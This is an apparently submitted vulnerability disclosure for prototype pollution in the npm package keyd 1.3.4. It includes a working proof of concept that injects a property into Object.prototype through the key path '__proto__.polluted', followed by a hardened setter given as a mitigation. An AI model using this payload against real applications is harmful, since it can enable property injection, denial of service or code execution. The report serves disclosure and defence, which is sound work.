I would like to report a prototype pollution vulnerability in the keyd module. It allows an attacker to inject properties on Object.prototype.
module name: keyd
version: 1.3.4
npm page: https://www.npmjs.com/package/keyd
description: A small library for using and manipulating key paths in JavaScript.
weekly downloads: 71
The set function can be used to add or modify properties of Object.prototype, because a key path such as __proto__.polluted is walked segment by segment with no check for prototype-affecting segments. Properties added this way are inherited by every object in the process.
Install the keyd module:
npm i keyd
Set the __proto__.polluted property of an object:
const keyd = require('keyd');
const obj = {};  // never written to directly
console.log("Before : " + obj.polluted);
keyd({}).set('__proto__.polluted', 'yes');  // key path walks into Object.prototype
console.log("After : " + obj.polluted);  // obj now inherits 'polluted'
Output:
Before : undefined
After : yes
Thank you for your time.
best regards,
d3lla
The impact depends on the application. In some cases it is possible to achieve Denial of Service (DoS), Remote Code Execution (RCE), or Property Injection.
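As an added mitigation example (not keyd's code, and not part of the original report), the setter below shows the check the set function is missing: each segment of the key path is rejected if it is __proto__, constructor or prototype, and only own properties are traversed, so the path from the proof of concept can never reach Object.prototype. The names safeSet, isDangerousSegment and isPolluted are hypothetical.

```javascript
// Hypothetical key-path setter hardened against prototype pollution.
// Not keyd's implementation; written to illustrate the missing check.
const FORBIDDEN_SEGMENTS = new Set(['__proto__', 'constructor', 'prototype']);

function isDangerousSegment(segment) {
  return FORBIDDEN_SEGMENTS.has(segment);
}

// Walks `path` (e.g. 'a.b.c') on `target`, creating plain objects as needed.
// Throws instead of traversing a forbidden segment, and never follows an
// inherited property, so an intermediate key that only exists on the
// prototype chain is not reused as the container for the next segment.
function safeSet(target, path, value) {
  const segments = path.split('.');
  let current = target;
  for (let i = 0; i < segments.length; i++) {
    const segment = segments[i];
    if (isDangerousSegment(segment)) {
      throw new Error('refusing to set prototype-affecting key: ' + segment);
    }
    if (i === segments.length - 1) {
      current[segment] = value;
      return target;
    }
    const own = Object.prototype.hasOwnProperty.call(current, segment);
    if (!own || typeof current[segment] !== 'object' || current[segment] === null) {
      current[segment] = {};
    }
    current = current[segment];
  }
  return target;
}

// Post-condition check: has `key` been planted on Object.prototype?
// Useful as an assertion in a test suite around any key-path library.
function isPolluted(key) {
  return Object.prototype.hasOwnProperty.call(Object.prototype, key);
}
```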